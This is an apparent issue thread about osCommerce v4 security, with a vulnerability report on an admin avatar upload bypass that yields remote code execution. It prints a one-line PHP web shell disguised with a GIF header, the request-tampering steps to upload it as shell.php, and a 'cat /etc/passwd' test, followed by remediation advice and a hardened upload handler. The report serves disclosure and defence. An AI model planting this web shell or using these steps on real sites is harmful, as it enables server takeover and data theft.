Security Issues in osCommerce v4 #62
Dear @osCommerce team, @JanZ, @haraldpdl, @markkevans, @gburton, @acidvertigo, @Gergely, @tgely, @osc2nuke, @scottcwilson, @nickw108, @foxp2, @gadlol, @vakondweb, @anthonyjhicks, @mommaroodles, @ynechitajlo, @pan-oscom, @vladmalyshev: Have you seen this security ticket?
Ten months later... I take my consequences and switch to a better maintained shop system.
@T-Qualizer Microweber is being actively developed
@gburton what's happened - I thought you were taking osCommerce to new heights?
I left osCommerce years ago when I could foresee the direction in which it was going, and years later, after revisiting it out of curiosity, I can't say I'm surprised to see it has been taken over by Holbi. osCommerce has been effectively dead for a number of years now.
RCE via file upload bypass
Hello team, I have identified a security vulnerability while editing the administrator's profile picture. By manipulating the file extension from 'shell.gif' to 'shell.php,' as outlined in the request below, the application erroneously processed the file with the altered extension.
Steps to Reproduce
To exploit this vulnerability, I initiated the upload process of a malicious GIF file by selecting 'edit' to upload the file. The request was intercepted using Burp Suite, as depicted in the image below. Throughout this process, I modified the file extension from 'shell.gif' to 'shell.php.' The content of this file included the following payload:
GIF89a;<?php system($_GET['cmd']); ?>
The provided payload is a straightforward yet potent PHP script intended to execute system commands based on the 'cmd' parameter in the GET request. The initial 'GIF89a;' serves as a GIF file header, deceiving the server into treating the file as a harmless image. This technique is a classic illustration of circumventing upload filters by exploiting the server's file-handling logic, thereby enabling the execution of arbitrary commands.
After completing the upload, I observed that the image appeared to load successfully, but the file extension still displayed as 'shell.gif.' However, upon clicking 'Update' and re-evaluating the request, I discovered that the 'avatar' parameter contained the file 'shell.gif.' By altering this to 'shell.php,' the upload was successfully executed, and the application accepted the file.
Upon accessing the 'shell.php' file in its directory, I achieved Remote Code Execution (RCE) successfully. For instance, executing the command 'cat /etc/passwd' demonstrated the ability to run server commands and potentially access sensitive data.
Affected Pages
POST /admin/upload
POST /admin/adminaccount/saveaccount
Remediation
File Type Verification:
Implement robust file type verification during the upload process. Check the file header and content to ensure they match the expected file type (e.g., GIF). This helps prevent attackers from manipulating file extensions and uploading malicious content.
Use Whitelisting:
Allow only specific file extensions that are necessary for the application's functionality. Whitelisting acceptable file types can reduce the risk of uploading malicious files.
File Content Inspection:
Conduct thorough inspection of the file's content, especially if it claims to be of a certain type. Analyze the structure of the file and verify that it adheres to the expected format for the specified file type.
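As an added example (not osCommerce's own code), the following PHP upload handler applies the three remediations above to the avatar upload described in this ticket: an extension whitelist, a header and MIME check, and a content check by decoding and re-encoding the image. It assumes a standard $_FILES entry and a destination directory where PHP files are not executed; both names and the directory are assumptions.

```php
<?php
// Added example, not osCommerce code. Assumed: $file is a $_FILES entry and
// $dir is a directory from which the web server never executes PHP.

// Whitelist of accepted image types: extension => [MIME type, magic bytes].
const ALLOWED_IMAGES = [
    'gif' => ['image/gif',  ['GIF87a', 'GIF89a']],
    'png' => ['image/png',  ["\x89PNG\r\n\x1a\n"]],
    'jpg' => ['image/jpeg', ["\xFF\xD8\xFF"]],
];

// Returns the safe extension to store under, or null to reject the upload.
function validateImage(string $tmpPath, string $clientName): ?string
{
    // 1. Extension whitelist: a name such as 'shell.php' stops here.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGES[$ext])) {
        return null;
    }
    [$mime, $magics] = ALLOWED_IMAGES[$ext];

    // 2. Header check: the bytes on disk must match the claimed type.
    $head = (string) file_get_contents($tmpPath, false, null, 0, 8);
    $headerOk = false;
    foreach ($magics as $magic) {
        $headerOk = $headerOk || strncmp($head, $magic, strlen($magic)) === 0;
    }
    // 3. MIME sniffing via fileinfo must agree with the extension as well.
    $sniffed = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    return ($headerOk && $sniffed === $mime) ? $ext : null;
}

// Stores the avatar under a server-chosen name and re-encodes it with GD, so a
// polyglot such as "GIF89a;<?php ..." either fails to decode or has everything
// after the pixel data discarded. The client-supplied name is never used, and
// the stored name is what the 'avatar' field should be populated with.
function storeAvatar(array $file, string $dir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = validateImage($file['tmp_name'], $file['name']);
    $img = $ext === null ? false
        : @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        return null;
    }
    $dest = $dir . '/' . bin2hex(random_bytes(16)) . '.png';
    $ok = imagepng($img, $dest);   // always written as PNG, named by the server
    imagedestroy($img);
    return $ok ? basename($dest) : null;
}
```

Because the stored filename is generated server-side and the extension is fixed, a later request that rewrites the 'avatar' parameter to 'shell.php' has nothing on disk to point at.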